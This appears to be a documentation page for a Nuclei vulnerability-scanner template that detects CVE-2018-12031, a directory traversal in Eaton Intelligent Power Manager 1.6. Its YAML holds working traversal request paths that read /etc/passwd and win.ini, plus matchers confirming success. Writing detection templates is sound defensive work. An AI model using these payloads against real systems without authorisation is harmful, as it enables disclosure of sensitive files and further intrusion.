Eaton Intelligent Power Manager 1.6 - Directory Traversal
ID: CVE-2018-12031
Severity: critical
Author: daffainfo
Tags: cve,cve2018,edb,lfi,eaton
Description
Section titled “Description”Eaton Intelligent Power Manager v1.6 allows an attacker to include a file via directory traversal, which can lead to sensitive information disclosure, denial of service and code execution.
YAML Source
Section titled “YAML Source”id: CVE-2018-12031
info: name: Eaton Intelligent Power Manager 1.6 - Directory Traversal author: daffainfo severity: critical description: Eaton Intelligent Power Manager v1.6 allows an attacker to include a file via directory traversal, which can lead to sensitive information disclosure, denial of service and code execution. impact: | An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system. remediation: | Apply the latest security patch or upgrade to a newer version of Eaton Intelligent Power Manager to mitigate this vulnerability. reference: - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion - https://www.exploit-db.com/exploits/48614 - https://nvd.nist.gov/vuln/detail/CVE-2018-12031 - https://github.com/0xT11/CVE-POC - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-12031 cwe-id: CWE-22 epss-score: 0.02759 epss-percentile: 0.90576 cpe: cpe:2.3:a:eaton:intelligent_power_manager:1.6:*:*:*:*:*:*:* metadata: max-request: 2 vendor: eaton product: intelligent_power_manager tags: cve,cve2018,edb,lfi,eaton
http: - method: GET path: - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd" - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini"
matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or
- type: status status: - 200# digest: 4a0a00473045022100d8ba27261a7e7a39e9ad82f332e1f36384a9943ef7cae2a9c99b660a45340e9302205ab9aa511a656b70b643605a059820e8ceb982fe07a0b6d20466e2633e5f38dd:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-12031.yaml"